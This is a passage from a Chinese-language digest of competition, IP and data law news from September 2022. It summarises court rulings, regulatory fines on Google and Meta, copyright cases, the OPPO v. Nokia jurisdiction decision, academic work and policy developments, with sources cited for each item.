Tech星球：《罚款不升反降！欧盟法院对谷歌的反垄断罚款调整至41.25亿欧元》，载“ 竞争法与商业战略”微信公众号，2022年9月14日，https://mp.weixin.qq.com/s/QY5s4CFRjT-XuFtJE2EUiA。

04 谷歌和Meta涉嫌在韩国非法收集个人信息被重罚

9月14日，科技巨头谷歌和Meta因涉嫌在韩国未经用户同意收集个人信息并将此用于在线投放个性化广告，分别被韩国个人信息保护委员会（下称“委员会”）罚款692亿韩元和308亿韩元。这是韩国首次就在线广告平台收集和利用用户信息的行为做出处罚决定。委员会还勒令两家公司若要收集和利用旗下用户利用其它公司平台的行为信息，必须提前通知用户，让用户容易、明确地了解情况并自由行使决定权。

来源：

社科大竞争法：《域外动态 || 谷歌和Meta涉嫌在韩国非法收集个人信息被重罚》，载“社科大竞争法”微信公众号，2022年9月16日，https://mp.weixin.qq.com/s/o8Gsew0ogN8t8CtZO93IWQ。

司法动态

05 2021年度上海版权十大典型案件发布

9月13日，上海市版权局与上海市人民检察院联合召开2022年上海版权保护工作新闻发布会，发布了2021年度上海版权十大典型案件。共有刑事案件3件、行政案件3件、民事案件4件，涵盖了网络直播、体育赛事、视听网站、游戏、实用艺术品等多个领域。十大典型案件聚焦重点前沿领域，覆盖体育赛事、视听网站、网络直播等多个近年来版权侵权行为高发的领域，通过对典型案件的审理，为规范相关行业的版权经营行为、强化企业主体责任、加强版权管理等，起到了良好的促进作用。

来源：

1. 君策Justra：《典型案例 | 2021年度上海版权十大典型案件发布》，载“君策Justra”微信公众号，2022年9月13日，https://mp.weixin.qq.com/s/63KxyHNvyWoOtUxWeQgaww。

2. 知产力：《附判决+文章 | 2021年度上海版权十大典型案件》，载“知产力”微信公众号，2022年9月14日，https://mp.weixin.qq.com/s/svMgNxEU2adTLDGsWKdz4Q。

06 平台下架短视频遭起诉 法院：易使大众产生不适，下架并无不当

某日，林某将自己在淋浴间吹头发的视频发布在了平台上，短时间内点击量就达到了15000次。但是一天过后，林某却收到了“您所发布的视频涉及低俗，未通过审核，已被禁止通过”的通知，此时他才知道自己的视频已经被平台下架，而平台给出的下架理由则为“视频中赤裸上身洗浴、身披浴袍吹头发等画面涉及低俗色情，有高度疑似裸露下体的情况”。针对短视频平台的说法，林某认为视频平台单方停播的行为严重损害了自己的权益，要求恢复视频的播放。林某反复申诉无果后将某短视频平台告上了法庭。

本案争议的焦点主要在于，视频平台对涉案视频进行下架处理是否符合网络服务合同的约定。法院认为，双方诉争画面虽然受清晰度、播放媒介的限制无法非常清楚地展现其是否裸露下体的实际情况，但综合涉案视频内容和一般观看者的感受而言，涉案视频画面存在裸露下体的高度可能性，极易使得社会大众产生不适并引发不当联想，认为其有意或者无意的暴露了身体的私密部位。同时，结合视频的主题、场景及被投诉的情况，法院认为短视频平台依据协议对涉案视频采取下架措施并无不当，且在下架后也已及时告知林某下架情况与申诉途径，并未违反网络服务合同的约定。

最终，法院对林某的各项请求均未予支持。

来源：

京法网事：《平台下架短视频遭起诉 法院：易使大众产生不适，下架并无不当》，载“京法网事”微信公众号，2022年9月13日，https://mp.weixin.qq.com/s/FVSLOrdddKjLpTt4CmVAUg?scene=25#wechat_redirect。

07 最高法院在OPPO诉诺基亚案中再次明确中国对SEP全球许可费具有管辖权

2022年9月7日，最高人民法院知识产权法庭就OPPO诉诺基亚全球许可费争议作出管辖权终审裁定，驳回诺基亚的上诉请求，维持了重庆市第一中级人民法院作出的一审裁定。

最高人民法院知识产权法庭经审查认为，根据各方当事人的诉辩主张及原审法院初步查明的事实，本案二审中的争议焦点为原审法院对本案是否具有管辖权，具体涉及以下三个层面的问题：一是中国法院对本案是否具有管辖权；二是如果中国法院对本案具有管辖权，原审法院对本案行使管辖权是否适当；三是如果原审法院具有管辖权，其在本案中是否适宜对涉案标准必要专利在全球范围内的许可使用条件作出裁判。

最终，最高人民法院知识产权法庭认为，中国是涉案标准必要专利的主要授权地、许可使用协议磋商地、可合理预见的缔约后合同履行地、主要实施许可地之一，与本案纠纷具有相当密切的地域联系，中国法院对本案具有无可争议的管辖权。其中，标准必要专利主要实施地的人民法院，与纠纷具有适当联系，对该纠纷具有管辖权，也相应可以审理涉案民事争议即涉案标准必要专利许可条件问题。

来源：

知产财经：《最新！最高法院在OPPO诉诺基亚案中再次明确中国对SEP全球许可费具有管辖权┃附裁定》，载“知产财经”微信公众号，2022年9月14日，https://mp.weixin.qq.com/s/4x0Bsy3Uskn-jicMsgJ3uQ。

学术动态

08 郭江兰：《数据可携带权保护范式的分殊与中国方案》

本文介绍而数据可携权的两种保护范式，并立足国内提出了中国有关数据可携带权保护方案。

数据可携权的第一种保护范式是“权利化模式”。“权利化模式”是指数据可携带权划归数据主体享有和支配，数据主体享有请求获取数据和移植数据的权利。数据可携带权有明确的权利结构，由相互独立的多项请求权构成，包含数据主体可以从数据控制者处获取个人数据的权利和数据主体能够将个人数据进行跨互联网平台移植两项基本要素。

数据可携带权的第二种保护范式是“行为规制模式”。数据主体所享有的数据可携带权是防御数据控制者侵犯自主利益的一种防御性、消极性的权利。数据可携带权的实现更需对数据控制者行为进行规制，数据控制者行为应当负有告知义务、核实义务、答复义务、安保义务和技术义务。

中国的数据可携权保护方案可从权利规则完善和数据控制者行为规制两个方向同时设计：

1.在个人信息保护法中完善数据可携带权的权利规则。 其一，扩大数据可携带权的数据范围，我国的个人数据可携权的范围应从个人主动提供的数据扩展到包括个人被动提供的数据如个人用户记录、历史轨迹、浏览网页记录、搜索历史等。其二，基于具体的场景运用，将数据可携带权进行分类管理，划清数据可携带权可行性边界。企业场景下若个人数据涉及隐私保护、商业秘密等，数据可携带权就应该慎重选择；在公共部门中的个人数据，有很强的社会管理属性，不宜刚性适用数据可携带权，公共数据则被希望扩大数据共享。

2.竞争法领域寻求对数据控制者更多的行为规制。数据可携带权实现与否，需要数据控制者按照相关要求进行配合，若在先经营者拒不配合、有选择地配合或有条件地配合，可能会涉嫌排除、限制竞争，构成拒绝交易行为、差别待遇行为和附加不合理交易条件行为。 特别是当某些数据构成“基础设施”时，经营者就需要履行相应的数据可携带义务，来减少“锁定效应”与“市场进入壁垒”。除了可对经营者数据携带行为进行事后规制外，也可对经营者进行事前规制。

来源：

郭江兰：《数据可携带权保护范式的分殊与中国方案》，载《北方法学》2022年第5期。

09 研讨综述：反不正当竞争法修订问题研讨会

2022年9月13日，上海法学会网络治理与数据信息法学研究会、上海交通大学知识产权与竞争法研究院于线上举办了反不正当竞争法修订问题研讨会。与会专家围绕“修订《反不正当竞争法》的基本理论”和“新型不正当竞争行为的规制”两个议题深入探讨，各抒灼见。

华中科技大学知识产权与竞争法中心郑友德教授介绍了中国反不正当竞争法两次修订内容与特征，指出：第一，要落实修订现行反法的立法宗旨和一般条款，不再以竞争关系为法律适用的前提，为消费者团体创设诉权；第二，宜修改完善商业秘密条款；第三，增设体现投资成果的数据保护条款；第四，在立法上要尽量区分反垄断与反不正当竞争，尽量不要把反垄断的规制内容放在不正当竞争法中。

华东政法大学知识产权学院王艳芳教授建议删除第十二条第二款第三项，或对“恶意”进行进一步的界定。王教授认为现行《反不正当竞争法》第十二条第二款第三项中的“恶意”界定不明，与该法第2条的适用界限模糊。她回顾了该项的修法历史，当时认为本项属于宣示性条款，但由于“恶意”的内涵不清晰，在当今倡导互联互通的大形势下存在被滥用的较大可能，使其无法在实践中起到规范指引和判断标准的作用。

来源：

上交知竞研究院：《反不正当竞争法第三次修订问题研讨会圆满落幕》，载“上海交大知识产权与竞争研究院”微信公众号，2022年9月16日，https://mp.weixin.qq.com/s/Eo7tw_BQbtK7avdSxhXcWg。

行业资讯

10 苹果对禁止反言裁决提出异议，请求最高院审查11亿美元侵权案

苹果和博通向美国最高法院提交了一份请愿书，请求法官审查联邦巡回法院在撤销加州理工学院11亿美元专利侵权胜诉案中做出的裁决，称其错误地扩大了在多方复审中对专利无效申请人的限制。

2021年1月，洛杉矶联邦陪审团判定苹果和博通侵犯了加州理工学院的数据传输专利权，命令苹果向加州理工学院赔偿8.378亿美元，并要求博通额外赔偿2.702亿美元。2月4日，联邦巡回法院驳回了陪审团关于苹果公司和博通公司需赔偿加州理工学院11亿美元的Wi-Fi技术专利侵权裁决，并下令重新审理此案，以确定赔偿数额。

联邦巡回法院的裁决是根据《美国发明法案》中的禁止反言条款作出的。苹果和博通认为，联邦巡回法院的解释是错误的，称该解释本质上改写了禁止反言条款，改变了地方法院诉讼和多方复审审查之间的关系，对美国专利制度有重大影响。

来源： 知识产权家：《11亿美元侵权案！苹果对禁止反言裁决提出异议，请求最高院审查》，载“知识产权家”微信公众号，2022年9月13日，https://mp.weixin.qq.com/s/jcffr1PEgEM_gN3UUoAJRw。

11 美国出台科技巨头六准则，推进反垄断和算法透明等

2022年9月8日，美国拜登政府召开专家会议，就市场竞争、隐私、青少年精神健康、算法透明和公正进行讨论，并推出六项准则，呼吁科技巨头改革和美国国会立法监管。

白宫发布的六项准则为：促进科技领域竞争；在联邦层面强有力地保护美国人的隐私；更强地保障少年儿童的线上隐私和安全；让科技巨头对平台上的有害内容负责；增加平台算法和内容审核决策的透明度；停止歧视性的算法决策。

来源：

财新网：《速递丨美国出台科技巨头六准则，推进反垄断和算法透明等》，载“竞争法大号外”微信公众号，2022年9月13日，https://mp.weixin.qq.com/s/aNe7IQEq1i6UfcL5sv0Ysw。